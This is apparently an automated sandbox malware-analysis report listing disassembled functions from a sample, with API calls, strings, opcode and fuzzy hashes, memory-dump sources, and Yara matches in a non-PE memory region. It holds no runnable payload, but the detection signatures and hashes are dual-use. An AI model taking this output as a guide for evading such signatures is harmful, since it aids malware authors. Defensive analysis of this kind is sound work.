API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

version, xrefs: 00415D9F
pScheduler, xrefs: 00415DB2

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 02165AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02165B8A
__alldvrm.LIBCMT ref: 02165D8B
__alldvrm.LIBCMT ref: 02165DAD

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: d2acca534963ae6d6d5bf224c7788cb6131185fa3778281a324610cc1788b2bc
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: 6DA19872980386BFDB25CF28C8887BEBBE7EF51354F5841ADD8959B281C3368951CB50

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 0216FC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0216FD9E

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
Instruction ID: 3e734b9f0331cd2dcedf85203657030562b81fa02ff79cc18058a90a61a6d9fc
Opcode Fuzzy Hash: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
Instruction Fuzzy Hash: 8C413C31AC0110AFDB346FB8AC4CABE3666EF46730F140655F83AD6590D73655628AA1

Function 02166B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0216047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02166B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02166BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02166BEC
__freea.LIBCMT ref: 02166BF5

Part of subcall function 0216390E: RtlAllocateHeap.NTDLL(00000000,0213DAD7,00000000), ref: 02163940

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 741c0c8b2752cf52d6a3b4cb7e308d013327ca6cb40bf2aaa7dfc05a94fe856d
Instruction ID: 84224f25765d65822d029169f04e59e8c3e8ac6368cca6e69aec623384eaca55
Opcode Fuzzy Hash: 741c0c8b2752cf52d6a3b4cb7e308d013327ca6cb40bf2aaa7dfc05a94fe856d
Instruction Fuzzy Hash: EF31A072A4025AEFDF358F65CC44DBE7BAAEB40714B054268EC14D7150EB3AD961CB90

Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0040D443
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D45D
_xtime_get.LIBCPMT ref: 0040D480
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D48C

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5

Function 0213D652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0213D6AA
__Xtime_diff_to_millis2.LIBCPMT ref: 0213D6C4
_xtime_get.LIBCPMT ref: 0213D6E7
__Xtime_diff_to_millis2.LIBCPMT ref: 0213D6F3

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction ID: 765ac7ae3ba5ee93c9dd3f68689f73cde7033e48a021fd418bb96345682d229d
Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction Fuzzy Hash: FD213176E402199FDF16EFA4DC819BEB7BAEF09714F100065E505A7250D774AE01CF91

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 02159330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0215934A

Part of subcall function 02159297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021592C6
Part of subcall function 02159297: ___AdjustPointer.LIBCMT ref: 021592E1

_UnwindNestedFrames.LIBCMT ref: 0215935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02159370
CallCatchBlock.LIBVCRUNTIME ref: 02159398

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 3c6647787059a3d206e86b136f84a9fd1c699747b1277eb27f12f2ec16284fa5
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: AD01F332140158FBDF125E95CC40EEB3F6AEF48754F044058FE2856120D332E861ABE1

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 02165196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0216513D,00000000,00000000,00000000,00000000,?,021653F5,00000006,0044A378), ref: 021651C8
GetLastError.KERNEL32(?,0216513D,00000000,00000000,00000000,00000000,?,021653F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02162213), ref: 021651D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0216513D,00000000,00000000,00000000,00000000,?,021653F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021651E2

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: e88fc2dc36f2bcc57083f491b67d8a21a849cddaa1c2505a95ce374772728443
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 79012B36682223BBC7214F79DC48E7FBB9AAF46FA27510634F916E7140C720D910CAE4

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 02156395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021563AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021563C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021563DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021563F3

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: 222158a58cf547f40a54a5f6fa4f650a53d9b643293e3e7709e493e03e9feae1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 1601D632640134EFCF56EE59CC40AAF77AE9F85350F410095EC39AB291DBB0ED118AE0

Function 02152B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02152BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02152BCF

Part of subcall function 02148687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 021486A8
Part of subcall function 02148687: Hash.LIBCMT ref: 021486E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02152BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02152BF8

Part of subcall function 0214F6DF: Hash.LIBCMT ref: 0214F6F1

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: 93ab7e064ae0a2f711a9af92a0fd512df964b3035cd1304400061317b56eddae
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: 4A118E77800604EFC715DF64C881ACAF7B9AF19320F05865EE96A87591EB70E904CBA0

Function 02152B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02152BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02152BCF

Part of subcall function 02148687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 021486A8
Part of subcall function 02148687: Hash.LIBCMT ref: 021486E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02152BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02152BF8

Part of subcall function 0214F6DF: Hash.LIBCMT ref: 0214F6F1

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: d76e3202e494d32fcfe8520e47fde26d4277f7e633a04e4f77ad2f43df7a6ec7
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 13012976500604AFC725DF65C881EDAF7E9EF49320F008A1EE96A87650DB70F945CFA0

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 021350CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 021350D1

Part of subcall function 0213BDAE: __EH_prolog3_GS.LIBCMT ref: 0213BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0213511C
__Getcoll.LIBCPMT ref: 0213512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0213513B

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 5dfc78f55bc1ddca66ef49484d9b234d49ce236fe95dba5c7ae056338bcf4473
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: E1019E71C90308EFDB05EFA4C444B9CB7B3BF58715F50802AD055AB280DBB49544CF91

Function 02135B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02135B8D

Part of subcall function 0213BDAE: __EH_prolog3_GS.LIBCMT ref: 0213BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 02135BD8
__Getcoll.LIBCPMT ref: 02135BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02135BF7

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 185cb649de199e102670eac7b53d2eca5d24a9cb8cac3bc00c6cfa74ce887bac
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
